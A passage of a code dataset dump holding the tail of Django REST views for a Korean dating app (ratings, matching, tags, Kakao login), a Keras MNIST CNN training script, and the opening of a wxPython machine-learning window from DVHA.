등록되어있는 스토리에 접근하여 content 수정\n def patch(self, request):\n story = request.data['story']\n\n user_stories = Story.objects.filter(user=request.user, story=story)\n\n if not user_stories:\n return Response('등록되어있지 않은 스토리 입니다.')\n\n # 아래 코드는 user_stories의 마지막번째를 불러옴\n # 어차피 user_stories는 한 개밖에 없을 것이기 때문에, user_stories[0]을 불러와도 상관은 없을 것임\n serializer = UserStorySerializer(user_stories.last(), data=request.data)\n\n if serializer.is_valid():\n story = serializer.save()\n\n data = {\n 'story': UserStorySerializer(story).data,\n }\n return Response(data)\n return Response(serializer.errors)\n\n # 스토리 삭제하기\n def delete(self, request, pk):\n story = Story.objects.filter(user=request.user, pk=pk)\n\n if story:\n story.delete()\n return Response('해당 스토리가 삭제되었습니다.')\n return Response('해당 스토리의 pk가 존재하지 않습니다.')\n\n\nclass UserRibbonAPIView(APIView):\n permission_classes = [permissions.IsAuthenticated, ]\n\n # User별 보유리본 조회\n def get(self, request):\n ribbons = UserRibbon.objects.filter(user=request.user)\n\n # 사실 계정 생성과 동시에 유저의 상태와 상관없이 리본 10개 지급되지만, 내역 없다고 response 설정\n if request.user.status() != 'pass':\n return Response('리본 내역이 없습니다.')\n\n serializer = UserRibbonSerializer(ribbons, many=True)\n\n data = {\n 'ribbonHistory': serializer.data,\n }\n return Response(data)\n\n def post(self, request):\n if request.user.status() != 'pass':\n return Response('가입심사를 합격한 유저가 아닙니다.')\n\n if not Token.objects.filter(user=request.user):\n return Response('인증 토큰이 없는 유저입니다. 로그인이 되어있습니까?')\n\n serializer = UserRibbonSerializer(data=request.data)\n\n # 보유 리본이 부족할 경우 response\n if request.user.userribbon_set.last().current_ribbon + request.data['paidRibbon'] < 0:\n return Response('보유 리본이 부족합니다.')\n\n if serializer.is_valid():\n ribbon = serializer.save(user=request.user)\n\n data = {\n 'ribbon': UserRibbonSerializer(ribbon).data,\n }\n return Response(data)\n return Response(serializer.errors)\n\n\nclass UserPickAPIView(APIView):\n permission_classes = [permissions.IsAuthenticated, ]\n\n # 해당 유저에 해 pick한 이성과 pick받은 이성 조회\n def get(self, request):\n pick_from_users = request.user.send_me_pick_users.all()\n pick_to_users = Pick.objects.filter(user=request.user)\n\n # 해당 유저가 pick받은 이성들\n pick_from_list = list()\n for pick_from_user in pick_from_users:\n # pick받은 이성들의 email 정보를 표대시\n pick_from_list.append(pick_from_user.email)\n\n # 해당 유저가 pick한 이성들\n pick_to_list = list()\n for pick_to_user in pick_to_users:\n pick_to_list.append(pick_to_user.partner.email)\n\n data = {\n 'pickFrom': pick_from_list,\n 'pickTo': pick_to_list,\n }\n return Response(data)\n\n # partner에게 pick 주기\n def post(self, request):\n if request.user.status() != 'pass':\n return Response('가입심사를 합격한 유저가 아닙니다.')\n\n # partner의 email 정보를 통해 pk에 접근\n partner = User.objects.get(email=request.data['partner'])\n\n if partner.status() != 'pass':\n return Response('가입심사를 합격한 이성이 아닙니다.')\n\n if request.user in partner.send_me_pick_users.all():\n return Response('이미 pick한 이성 입니다.')\n\n data = {\n 'user': request.user.pk,\n 'partner': partner.pk,\n }\n\n serializer = UserPickSerializer(data=data)\n\n if serializer.is_valid():\n like_true = serializer.save()\n return Response(UserPickSerializer(like_true).data)\n return Response(serializer.errors)\n\n\n# 가입심사 중인 이성 리스트\nclass UserScreeningAPIView(APIView):\n permission_classes = [permissions.IsAuthenticated, ]\n\n def get(self, request):\n partners = get_queryset_not_superuser(self, request)\n\n screening_users = list()\n for partner in partners:\n if (partner.status() == 'on_screening') or (partner.status() == 
'waiting'):\n screening_users.append(partner.email)\n return Response(screening_users)\n\n\nclass UserStarAPIView(APIView):\n permission_classes = [permissions.IsAuthenticated, ]\n\n # 가입심사 보낸 이성과 받은 이성 리스트 및 해당 유저의 평균 별점 조회\n def get(self, request):\n stars_from = request.user.send_me_star_users.all()\n stars_to = Star.objects.filter(user=request.user)\n\n stars_from_list = list()\n for star_from in stars_from:\n # 가입심사 한 이성의 email 값과 이성이 준 별점을 tuple 형태로 추가\n stars_from_list.append(\n (star_from.email, Star.objects.filter(user=star_from, partner=request.user)[0].star)\n )\n\n stars_to_list = list()\n for star_to in stars_to:\n # 가입심사 받은 이성의 email 값과 이성에게 준 별점을 tuple 형태로 추가\n stars_to_list.append(\n (star_to.partner.email, Star.objects.filter(user=request.user, partner=star_to.partner)[0].star)\n )\n\n data = {\n 'starTo': stars_to_list,\n 'starFrom': stars_from_list,\n }\n return Response(data)\n\n def post(self, request):\n if request.user.status() != 'pass':\n return Response('가입심사를 통과한 유저가 아닙니다.')\n\n if not Token.objects.filter(user=request.user):\n return Response('인증 토큰이 없는 유저입니다. 로그인이 되어있습니까?')\n\n # partner의 email 정보를 통해 pk에 접근\n partner = User.objects.get(email=request.data['partner'])\n\n # 넣지 않아도 되는지 확인 필요!\n if partner.status() == 'fail':\n return Response('이미 가입심사를 불합격한 이성입니다.')\n\n star = request.data['star']\n\n if request.user in partner.send_me_star_users.all():\n return Response('이미 가입심사한 이성 입니다.')\n\n data = {\n 'user': request.user.pk,\n 'partner': partner.pk,\n 'star': star,\n }\n\n serializer = UserStarSerializer(data=data)\n\n if serializer.is_valid():\n star = serializer.save()\n return Response(UserStarSerializer(star).data)\n return Response(serializer.errors)\n\n # 가입심사한 이성 재심사 (일단 재심사 안하기로 함)\n # def patch(self, request):\n # if not Token.objects.filter(user=request.user):\n # return Response('인증 토큰이 없는 유저입니다. 
로그인이 되어있습니까?')\n #\n # partners = request.user.user_star_set.all()\n # star = request.data['star']\n #\n # for partner in partners:\n # if not partner.partner.email == request.data['partner']:\n # return Response('가입심사한 적 없는 이성입니다.')\n # else:\n # data = {\n # 'user': request.user.pk,\n # 'partner': partner.partner.pk,\n # 'star': star\n # }\n # serializer = UserStarSerializer(partner, data=data)\n #\n # if serializer.is_valid():\n # stars = serializer.save()\n # return Response(UserStarSerializer(stars).data)\n # return Response(serializer.errors)\n\n\nclass UserIdealTypeAPIView(APIView):\n permission_classes = [permissions.IsAuthenticated, ]\n\n # 해당 유저의 현재 이상형 설정 정보 조회와 맞춤 이성 소개\n def get(self, request):\n user = request.user\n ideal_type = UserIdealType.objects.filter(user=user)\n\n if not ideal_type:\n return Response('등록된 이상형 정보가 없습니다.')\n\n partners = get_queryset_not_superuser(self, request)\n\n # ideal_partners에 이상형 조건이 (하나라도) 포함된 이성 저장\n ideal_partners = list()\n # 선호지역2가 있어서 나머지 정보는 2번 넣고, 선호지역2만 1번 넣는걸로 일단 설정..\n for partner in partners:\n if user.useridealtype_set.last().age_from and (\n partner.age() >= user.useridealtype_set.last().age_from) and (\n partner.age() <= user.useridealtype_set.last().age_to):\n ideal_partners.append(partner)\n ideal_partners.append(partner)\n print('ideal_partners age >> ', ideal_partners)\n\n if user.useridealtype_set.last().region and (\n partner.userinfo.region == user.useridealtype_set.last().region):\n ideal_partners.append(partner)\n ideal_partners.append(partner)\n print('ideal_partners region >> ', ideal_partners)\n\n if user.useridealtype_set.last().region and (\n partner.userinfo.region == user.useridealtype_set.last().region2):\n ideal_partners.append(partner)\n\n if user.useridealtype_set.last().tall_from and partner.userinfo.tall and (\n partner.userinfo.tall >= user.useridealtype_set.last().tall_from) and (\n partner.userinfo.tall <= user.useridealtype_set.last().tall_to):\n ideal_partners.append(partner)\n ideal_partners.append(partner)\n print('ideal_partners tall >> ', ideal_partners)\n\n if user.useridealtype_set.last().body_shape and (\n partner.userinfo.body_shape == user.useridealtype_set.last().body_shape):\n ideal_partners.append(partner)\n print('ideal_partners body >> ', ideal_partners)\n\n if user.useridealtype_set.last().personality:\n for personality in user.useridealtype_set.last().personality:\n if personality in partner.userinfo.personality:\n ideal_partners.append(partner)\n ideal_partners.append(partner)\n print('ideal_partners personality >> ', ideal_partners)\n\n if user.useridealtype_set.last().religion and (\n partner.userinfo.religion == user.useridealtype_set.last().religion):\n ideal_partners.append(partner)\n ideal_partners.append(partner)\n print('ideal_partners religion >> ', ideal_partners)\n\n if user.useridealtype_set.last().smoking and (\n partner.userinfo.smoking == user.useridealtype_set.last().smoking):\n ideal_partners.append(partner)\n ideal_partners.append(partner)\n print('ideal_partners smoking >> ', ideal_partners)\n\n if user.useridealtype_set.last().drinking and (\n partner.userinfo.drinking == user.useridealtype_set.last().drinking):\n ideal_partners.append(partner)\n ideal_partners.append(partner)\n print('ideal_partners drinking >> ', ideal_partners)\n\n # better_partners에 포함된 이성들의 중복 횟수 저장 (많을수록 better)\n better_partners = dict()\n for ideal_partner in ideal_partners:\n try:\n better_partners[ideal_partner] += 1\n except:\n better_partners[ideal_partner] = 1\n print('better_partners >> 
', better_partners)\n\n        if better_partners:\n            max_count = max(better_partners.values())\n\n            # best_partners에 횟수가 가장 많은 이성 저장\n            best_partners = list()\n            for key, value in better_partners.items():\n                if value == max_count:\n                    best_partners.append(key.email)\n            print('best_partners >> ', best_partners)\n\n            data = {\n                'idealPartners': best_partners,\n            }\n            return Response(data)\n        else:\n            data = {\n                'idealPartners': '없음',\n            }\n            return Response(data)\n\n    # (첫) 이상형 정보 설정\n    def post(self, request):\n        if not Token.objects.filter(user=request.user):\n            return Response('인증 토큰이 없는 유저입니다. 로그인이 되어있습니까?')\n\n        if request.user.status() != 'pass':\n            return Response('가입심사를 합격한 유저가 아닙니다.')\n\n        ideal_type = UserIdealType.objects.filter(user=request.user)\n        if ideal_type:\n            return Response('이미 등록한 이상형 정보가 있습니다.')\n\n        serializer = IdealTypeSerializer(data=request.data, partial=True)\n\n        if serializer.is_valid():\n            ideal_type = serializer.save(user=request.user)\n            data = {\n                'idealTypeInfo': IdealTypeSerializer(ideal_type).data,\n            }\n            return Response(data)\n        return Response(serializer.errors)\n\n    # 등록돼 있는 이상형 정보 수정\n    def patch(self, request):\n        if request.user.status() != 'pass':\n            return Response('가입심사를 합격한 유저가 아닙니다.')\n\n        if not Token.objects.filter(user=request.user):\n            return Response('인증 토큰이 없는 유저입니다. 로그인이 되어있습니까?')\n\n        ideal_type = UserIdealType.objects.filter(user=request.user)\n\n        if not ideal_type:\n            return Response('등록된 이상형 정보가 없습니다.')\n\n        # 현재는 기존 저장된 데이터는 수정되지 않으면 그대로 저장되도록 설정 (partial=True)\n        serializer = IdealTypeSerializer(ideal_type.last(), data=request.data, partial=True)\n\n        if serializer.is_valid():\n            ideal_type = serializer.save()\n\n            data = {\n                'idealTypeInfo': IdealTypeSerializer(ideal_type).data,\n            }\n            return Response(data)\n        return Response(serializer.errors)\n\n\nclass UserTagAPIView(APIView):\n    permission_classes = [permissions.IsAuthenticated, ]\n\n    # 해당 유저의 모든 관심태그 조회\n    def get(self, request):\n        if request.user.tag is None:\n            request.user.tag = TagType.objects.create()\n            request.user.save()\n\n        data = {\n            'tags': TagTypeSerializer(request.user.tag).data,\n        }\n        return Response(data)\n\n    # 현재 작동 안됨.! 
(태그타입별로 api 넣지 않고 한꺼번에 partial update 시도했으나 실패..)\n # def patch(self, request):\n # user = request.user\n # serializer = TagTypeSerializer(data=request.data, partial=True)\n # print('serializer >> ', serializer)\n #\n # if serializer.is_valid():\n # print('valid!')\n # date_style_tags = []\n # life_style_tags = []\n # charm_tags = []\n # relationship_style_tags = []\n #\n # if request.data['dateStyle']:\n # update_date_tags = serializer.validated_data.pop('date_style_tag')\n #\n # for update_date_tag in update_date_tags:\n # date_style_tags.append(Tag.objects.get_or_create(**update_date_tag[0]))\n # print('date_style_tags >> ', date_style_tags)\n # user.date_style_tag.set(date_style_tags)\n #\n # if request.data['lifeStyle']:\n # update_life_tags = serializer.validated_data.pop('life_style_tag')\n #\n # for update_life_tag in update_life_tags:\n # life_style_tags.append(Tag.objects.get_or_create(**update_life_tag[0]))\n # user.life_style_tag.set(life_style_tags)\n # print('life_style_tags >> ', life_style_tags)\n #\n # if request.data['charm']:\n # update_charm_tags = serializer.validated_data.pop('charm_tag')\n #\n # for update_charm_tag in update_charm_tags:\n # charm_tags.append(Tag.objects.get_or_create(**update_charm_tag[0]))\n # user.charm_tag.set(charm_tags)\n # print('charm_tags >> ', charm_tags)\n #\n # if request.data['relationshipStyle']:\n # update_relationship_tags = serializer.validated_data.pop('relathionship_style_tag')\n #\n # for update_relationship_tag in update_relationship_tags:\n # relationship_style_tags.append(Tag.objects.get_or_create(**update_relationship_tag[0]))\n # user.relationship_style_tag.set(relationship_style_tags)\n # print('relationship_style_tags >> ', relationship_style_tags)\n #\n # return Response(TagTypeSerializer(user).data)\n # return Response(serializer.errors)\n\n\nclass UserTagDateStyleAPIView(APIView):\n permission_classes = [permissions.IsAuthenticated, ]\n\n # 데이트 스타일 관심태그 추가\n def patch(self, request):\n if not Token.objects.filter(user=request.user):\n return Response('인증 토큰이 없는 유저입니다. 로그인이 되어있습니까?')\n\n serializer = TagTypeSerializer(data=request.data, partial=True)\n\n if serializer.is_valid():\n tags = []\n update_tags = serializer.validated_data.pop('date_style_tag')\n\n for update_tag in update_tags:\n tags.append(Tag.objects.get_or_create(**update_tag)[0])\n\n if request.user.tag is None:\n request.user.tag = TagType.objects.create()\n request.user.save()\n\n request.user.tag.date_style_tag.set(tags)\n return Response(TagTypeSerializer(request.user.tag).data)\n return Response(serializer.errors)\n\n\nclass UserTagLifeStyleAPIView(APIView):\n permission_classes = [permissions.IsAuthenticated, ]\n\n # 라이프 스타일 관심태그 수정\n # 기존 등록된 관심태그에서 추가되고 삭제되는 것이 아니라, request.data로 타입별 태그 전체 수정\n def patch(self, request):\n if not Token.objects.filter(user=request.user):\n return Response('인증 토큰이 없는 유저입니다. 
로그인이 되어있습니까?')\n\n serializer = TagTypeSerializer(data=request.data, partial=True)\n\n if serializer.is_valid():\n tags = []\n update_tags = serializer.validated_data.pop('life_style_tag')\n\n for update_tag in update_tags:\n tags.append(Tag.objects.get_or_create(**update_tag)[0])\n\n if request.user.tag is None:\n request.user.tag = TagType.objects.create()\n request.user.save()\n\n request.user.tag.life_style_tag.set(tags)\n return Response(TagTypeSerializer(request.user.tag).data)\n return Response(serializer.errors)\n\n\nclass UserTagCharmAPIView(APIView):\n permission_classes = [permissions.IsAuthenticated, ]\n\n def patch(self, request):\n if not Token.objects.filter(user=request.user):\n return Response('인증 토큰이 없는 유저입니다. 로그인이 되어있습니까?')\n\n serializer = TagTypeSerializer(data=request.data, partial=True)\n\n if serializer.is_valid():\n tags = []\n update_tags = serializer.validated_data.pop('charm_tag')\n\n for update_tag in update_tags:\n tags.append(Tag.objects.get_or_create(**update_tag)[0])\n\n if request.user.tag is None:\n request.user.tag = TagType.objects.create()\n request.user.save()\n\n request.user.tag.charm_tag.set(tags)\n return Response(TagTypeSerializer(request.user.tag).data)\n return Response(serializer.errors)\n\n\nclass UserTagRelationshipAPIView(APIView):\n permission_classes = [permissions.IsAuthenticated, ]\n\n def patch(self, request):\n if not Token.objects.filter(user=request.user):\n return Response('인증 토큰이 없는 유저입니다. 로그인이 되어있습니까?')\n\n serializer = TagTypeSerializer(data=request.data, partial=True)\n\n if serializer.is_valid():\n tags = []\n update_tags = serializer.validated_data.pop('relationship_style_tag')\n\n for update_tag in update_tags:\n tags.append(Tag.objects.get_or_create(**update_tag)[0])\n\n if request.user.tag is None:\n request.user.tag = TagType.objects.create()\n request.user.save()\n\n request.user.tag.relationship_style_tag.set(tags)\n return Response(TagTypeSerializer(request.user.tag).data)\n return Response(serializer.errors)\n\n\n# 테마 소개\nclass UserThemaAPIView(APIView):\n permission_classes = [permissions.IsAuthenticated, ]\n\n def get(self, request):\n if request.user.status() != 'pass':\n return Response('가입심사를 합격한 유저가 아닙니다.')\n\n partners = get_queryset_not_superuser(self, request)\n\n # 해당 유저가 여자일 경우, 남자 테마별 이성 소개\n if request.user.gender == '여자':\n neither_drinks_nor_smokes = list()\n four_years_older = list()\n over_180_tall = list()\n church_men = list()\n\n for partner in partners:\n # 술담배를 멀리하는 남자\n if (partner.userinfo.drinking == '마시지 않음') and (partner.userinfo.smoking == '비흡연'):\n neither_drinks_nor_smokes.append(partner.email)\n\n # 성숙한 매력의 4살연상\n if partner.age() == (request.user.age() + 4):\n four_years_older.append(partner.email)\n\n # 키 180cm 이상의 훈남\n if partner.userinfo.tall and (partner.userinfo.tall >= 180):\n over_180_tall.append(partner.email)\n\n # 다정다감한 교회오빠\n if partner.userinfo.religion == '기독교':\n church_men.append(partner.email)\n\n data = {\n 'neitherDrinksNorSmokes': neither_drinks_nor_smokes,\n 'fourYearsOlder': four_years_older,\n 'over180Tall': over_180_tall,\n 'churchMen': church_men,\n }\n return Response(data)\n\n # 해당 유저가 남자일 경우, 여자 테마별 이성 소개\n else:\n over_167_tall = list()\n four_years_younger = list()\n neither_drinks_nor_smokes = list()\n cute_women = list()\n\n for partner in partners:\n # 167cm 이상 큰 키의 그녀\n if partner.userinfo.tall and (partner.userinfo.tall >= 167):\n over_167_tall.append(partner.email)\n\n # 궁합도 안보는 4살연하\n if partner.age() == (request.user.age() - 4):\n 
four_years_younger.append(partner.email)\n\n # 술담배를 멀리하는 그녀\n if (partner.userinfo.drinking == '마시지 않음') and (partner.userinfo.smoking == '비흡연'):\n neither_drinks_nor_smokes.append(partner.email)\n\n # 귀여운 매력의 그녀\n if '귀여운' in partner.userinfo.personality:\n cute_women.append(partner.email)\n\n data = {\n 'over167Tall': over_167_tall,\n 'fourYearsYounger': four_years_younger,\n 'neitherDrinksNorSmokes': neither_drinks_nor_smokes,\n 'cuteWomen': cute_women,\n }\n return Response(data)\n\n\n# 유저에게 높은 점수를 준 이성(받은 표현)과 유저가 높은 점수를 준 이성(보낸 표현) 리스트 조회\nclass UserExpressionAPIView(APIView):\n permission_classes = [permissions.IsAuthenticated, ]\n\n def get(self, request):\n if request.user.status() != 'pass':\n return Response('가입심사를 합격한 유저가 아닙니다.')\n\n received_partners = request.user.partner_star_set.all()\n sent_partners = request.user.user_star_set.all()\n\n received_high_partners = list()\n for partner in received_partners:\n if partner.star >= 4:\n received_high_partners.append(partner.user.email)\n print('received_high_partners >> ', received_high_partners)\n\n sent_high_partners = list()\n for partner in sent_partners:\n if partner.star >= 4:\n sent_high_partners.append(partner.partner.email)\n print('sent_high_partners >> ', sent_high_partners)\n\n data = {\n 'ReceivedPartners': received_high_partners,\n 'SentPartners': sent_high_partners,\n }\n return Response(data)\n\n\n# 카카오톡 로그인 페이지\ndef KaKaoTemplate(request):\n return render(request, 'kakao.html')\n\n\n# 카카오톡 로그인\nclass KaKaoLoginAPIView(APIView):\n # iOS 부분\n # def get(self, request):\n # app_key = SECRETS['KAKAO_APP_KEY']\n # kakao_access_code = request.GET.get('code', None)\n # url = SECRETS['KAKAO_URL']\n # headers = {\n # 'Content-type': SECRETS['KAKAO_CONTENT_TYPE']\n # }\n #\n # data = {\n # 'grant_type': 'authorization_code',\n # request. 
'client_id': app_key,\n # 'redirect_uri': SECRETS['KAKAO_REDIRECT_URI'],\n # 'code': kakao_access_code,\n # }\n #\n # kakao_response = requests.post(url, headers=headers, data=data)\n # return Response(f'{kakao_response.text}')\n\n # 액세스 토큰 받아 가입 혹은 로그인 처리\n def post(self, request):\n access_token = request.data['accessToken']\n gender = request.data['gender']\n me_url = SECRETS['KAKAO_ME_URL']\n me_headers = {\n 'Authorization': f'Bearer {access_token}',\n 'Content-type': SECRETS['KAKAO_CONTENT_TYPE'],\n }\n me_response = requests.get(me_url, headers=me_headers)\n me_response_data = me_response.json()\n print('me_response_data >> ', me_response_data)\n\n # 카카오톡 계정의 이메일로 user의 email 생성\n kakao_email = me_response_data['kakao_account']['email']\n\n if not User.objects.filter(email=kakao_email).exists():\n user = User.objects.create_user(email=kakao_email, gender=gender)\n token = Token.objects.create(user=user)\n else:\n user = User.objects.get(email=kakao_email, gender=gender)\n token, _ = Token.objects.get_or_create(user=user)\n\n # 카카오톡 계정의 고유 id로 user의 username 생성\n # kakao_id = me_response_data['id']\n # kakao_username = f'n_{kakao_id}'\n #\n # if not User.objects.filter(username=kakao_username).exists():\n # user = User.objects.create_user(username=kakao_username)\n # token = Token.objects.create(user=user)\n # else:\n # user = User.objects.get(username=kakao_username)\n # token, _ = Token.objects.get_or_create(user=user)\n\n data = {\n 'user': KakaoUserSerializer(user).data,\n 'token': token.key\n }\n return Response(data)\n","repo_name":"moorekwon/amantha","sub_path":"app/members/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":38727,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"70019443771","text":"from __future__ import print_function\n\n#The two folloing lines allow to reduce tensorflow verbosity\nimport os\n\nos.environ['TF_CPP_MIN_LOG_LEVEL']='1' # '0' for DEBUG=all [default], '1' to filter INFO msgs, '2' to filter WARNING msgs, '3' to filter all msgs\n\nimport tensorflow as tf\nimport tensorflow.keras\nfrom tensorflow.keras.datasets import mnist\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Dropout, Conv2D, MaxPooling2D, Flatten\nfrom tensorflow.keras.optimizers import RMSprop\n\nfrom tensorflow.keras.preprocessing import image\n\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport random\nimport os \nimport operator\n\nprint('tensorflow:', tf.__version__)\nprint('keras:', tensorflow.keras.__version__)\n\n##Uncomment the following two lines if you get CUDNN_STATUS_INTERNAL_ERROR initialization errors.\n## (it happens on RTX 2060 on room 104/moneo or room 204/lautrec) \nphysical_devices = tf.config.experimental.list_physical_devices('GPU')\ntf.config.experimental.set_memory_growth(physical_devices[0], True)\n\n\n\n#load (first download if necessary) the MNIST dataset\n# (the dataset is stored in your home direcoty in ~/.keras/datasets/mnist.npz\n# and will take ~11MB)\n# data is already split in train and test datasets\n(x_train, y_train), (x_test, y_test) = mnist.load_data()\n\n# x_train : 60000 images of size 28x28, i.e., x_train.shape = (60000, 28, 28)\n# y_train : 60000 labels (from 0 to 9)\n# x_test : 10000 images of size 28x28, i.e., x_test.shape = (10000, 28, 28)\n# x_test : 10000 labels\n# all datasets are of type uint8\nprint('x_train.shape=', x_train.shape)\nprint('y_test.shape=', y_test.shape)\n\n#To input our values in our 
network Conv2D layer, we need to reshape the datasets, i.e.,\n# pass from (60000, 28, 28) to (60000, 28, 28, 1) where 1 is the number of channels of our images\nimg_rows, img_cols = x_train.shape[1], x_train.shape[2]\nx_train = x_train.reshape(x_train.shape[0], img_rows, img_cols, 1)\nx_test = x_test.reshape(x_test.shape[0], img_rows, img_cols, 1)\n\n#Convert to float\nx_train = x_train.astype('float32')\nx_test = x_test.astype('float32')\n\n#Normalize inputs from [0; 255] to [0; 1]\nx_train = x_train / 255\nx_test = x_test / 255\n\nprint('x_train.shape=', x_train.shape)\nprint('x_test.shape=', x_test.shape)\n\nnum_classes = 10\n\n#Convert class vectors to binary class matrices (\"one hot encoding\")\n## Doc : https://keras.io/utils/#to_categorical\ny_train = tensorflow.keras.utils.to_categorical(y_train, num_classes)\ny_test = tensorflow.keras.utils.to_categorical(y_test, num_classes)\n# num_classes is computed automatically here\n# but it is dangerous if y_test has not all the classes\n# It would be better to pass num_classes=np.max(y_train)+1\n\n\n\n#Let start our work: creating a convolutional neural network\n\nmnist_shape= (28,28,1)\nbatch_size = 128\nepochs = 15\n\n\ndef history(history):\n # Plot training & validation accuracy values\n plt.plot(history.history['accuracy'])\n plt.plot(history.history['val_accuracy'])\n plt.title('Model accuracy')\n plt.ylabel('Accuracy')\n plt.xlabel('Epoch')\n plt.legend(['Train', 'Test'], loc='upper left')\n plt.show()\n\n # Plot training & validation loss values\n plt.plot(history.history['loss'])\n plt.plot(history.history['val_loss'])\n plt.title('Model loss')\n plt.ylabel('Loss')\n plt.xlabel('Epoch')\n plt.legend(['Train', 'Test'], loc='upper left')\n plt.show()\n\n\n#####TO COMPLETE\ndef CNN_test():\n model = Sequential()\n model.add(Conv2D(7,kernel_size=(5,5),strides=(1,1),padding='same',input_shape=(32,32,3)))\n return model\n\ndef CNN_mnist():\n model = Sequential()\n model.add(Conv2D(32,kernel_size=(3,3),strides=(1,1),padding='same',activation='relu',input_shape = mnist_shape))\n model.add(Conv2D(64,kernel_size=(3,3),strides=(1,1),padding='same',activation='relu'))\n model.add(MaxPooling2D(pool_size=(2,2)))\n model.add(Dropout(0.3))\n model.add(Flatten())\n model.add(Dropout(0.5))\n model.add(Dense(128,activation='relu'))\n model.add(Dense(num_classes,activation = 'softmax'))\n\n model.compile(loss='categorical_crossentropy',\n optimizer='adam',\n metrics=['accuracy'])\n return model\n\nif(os.path.isfile('mnist_model.h5')):\n mnist=tf.keras.models.load_model('mnist_model.h5')\n print (\"Model found and loaded\")\n\nelse:\n mnist=CNN_mnist()\n fit = mnist.fit(x_train, y_train,batch_size=batch_size,epochs=epochs,verbose=1,validation_data=(x_test, y_test))\n history(fit)\n score = mnist.evaluate(x_test, y_test, verbose=0)\n print('Test loss:', score[0])\n print('Test accuracy:', score[1])\n mnist.save(\"mnist_model.h5\")\n\ny_hat = mnist.predict(x_test)\nplt.figure(figsize=(14,14))\nmin = np.ones((25,2))\n\nclass_names = ['0', '1', '2', '3', '4',\n '5', '6', '7', '8', '9']\n \nfor i in range(y_hat.shape[0]):\n class_test = np.argmax(y_test[i][:])\n class_pred = np.argmax(y_hat[i][:])\n if(class_test != class_pred) :\n for j in range(25) :\n if min[j][0] > y_hat[i][class_pred] :\n min[j][0] = y_hat[i][class_pred]\n min[j][1] = i\n min = sorted(min, key=operator.itemgetter(0), reverse = True)\n break\nmin = sorted(min, key=operator.itemgetter(0))\n\n\nfor i in range(25):\n pic = (int)(min[i][1])\n plt.subplot(5,5,i+1)\n plt.xticks([])\n 
plt.yticks([])\n plt.grid(False)\n plt.imshow(x_test[pic], cmap=plt.cm.binary)\n # The CIFAR labels happen to be arrays, \n # which is why you need the extra index\n class_test = np.argmax(y_test[pic][:])\n class_pred = np.argmax(y_hat[pic][:])\n percentage = str(int(y_hat[pic][class_pred]*100))\n plt.xlabel(\"VT : \" + class_names[class_test] + \", Pred : \" + class_names[class_pred] + \" (\" + percentage + \"%)\")\nplt.show()\n","repo_name":"carl-221b/deeplearning","sub_path":"mnist.py","file_name":"mnist.py","file_ext":"py","file_size_in_byte":5737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"72982340092","text":"import wx\nimport numpy as np\nfrom sklearn.ensemble import (\n RandomForestRegressor,\n GradientBoostingRegressor,\n RandomForestClassifier,\n GradientBoostingClassifier,\n)\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.svm import SVR, SVC\nfrom sklearn.tree import DecisionTreeRegressor, DecisionTreeClassifier\nfrom sklearn.neural_network import MLPClassifier, MLPRegressor\nfrom dvha.dialogs.export import save_data_to_file\nfrom dvha.dialogs.main import ShowList\nfrom dvha.options import DefaultOptions\nfrom dvha.paths import MODELS_DIR\nfrom dvha.models.plot import PlotMachineLearning, PlotFeatureImportance\nfrom dvha.tools.utilities import (\n set_msw_background_color,\n get_window_size,\n load_object_from_file,\n set_frame_icon,\n get_selected_listctrl_items,\n)\n\n\nclass MachineLearningFrame(wx.Frame):\n def __init__(\n self,\n main_app_frame,\n data,\n title,\n sklearn_predictor=None,\n alg_type=\"regressor\",\n tool_tips=None,\n include_test_data=True,\n ):\n wx.Frame.__init__(self, None)\n\n self.main_app_frame = main_app_frame\n self.data = data\n self.title = title\n self.sklearn_predictor = [\n sklearn_predictor,\n ALGORITHMS[title][alg_type],\n ][sklearn_predictor is None]\n self.tool_tips = [tool_tips, ALGORITHMS[title][\"tool_tips\"]][\n tool_tips is None\n ]\n self.include_test_data = include_test_data\n\n self.model = None\n is_classifier = alg_type == \"classifier\"\n self.plot = PlotMachineLearning(\n self,\n ml_type=self.title,\n ml_type_short=self.ml_type_short,\n include_test_data=include_test_data,\n is_classifier=is_classifier,\n **self.data\n )\n\n self.feature_importance_dlg = None\n\n self.input = {}\n self.defaults = {}\n self.getters = {}\n\n self.data_split_input = {\n \"test_size\": wx.TextCtrl(self, wx.ID_ANY, \"0.25\"),\n \"train_size\": wx.TextCtrl(self, wx.ID_ANY, \"None\"),\n \"random_state\": wx.TextCtrl(self, wx.ID_ANY, \"None\"),\n \"shuffle\": wx.ComboBox(\n self,\n wx.ID_ANY,\n choices=[\"True\", \"False\"],\n style=wx.CB_DROPDOWN | wx.CB_READONLY,\n ),\n }\n\n self.data_split_defaults = {\n \"test_size\": 0.25,\n \"train_size\": None,\n \"random_state\": None,\n \"shuffle\": True,\n }\n\n self.data_split_getters = {\n \"test_size\": self.to_float_or_none,\n \"train_size\": self.to_float_or_none,\n \"random_state\": self.to_int_or_none,\n \"shuffle\": self.to_bool,\n }\n\n self.button_calculate = wx.Button(self, wx.ID_ANY, \"Calculate\")\n self.button_features = wx.Button(self, wx.ID_ANY, \"Features\")\n self.button_importance = wx.Button(self, wx.ID_ANY, \"Importance Plot\")\n self.button_export_data = wx.Button(self, wx.ID_ANY, \"Export Data\")\n self.button_save_figure = wx.Button(self, wx.ID_ANY, \"Save Figure\")\n self.button_save_model = wx.Button(self, wx.ID_ANY, \"Save Model\")\n\n self.do_bind()\n\n def do_bind(self):\n self.Bind(\n 
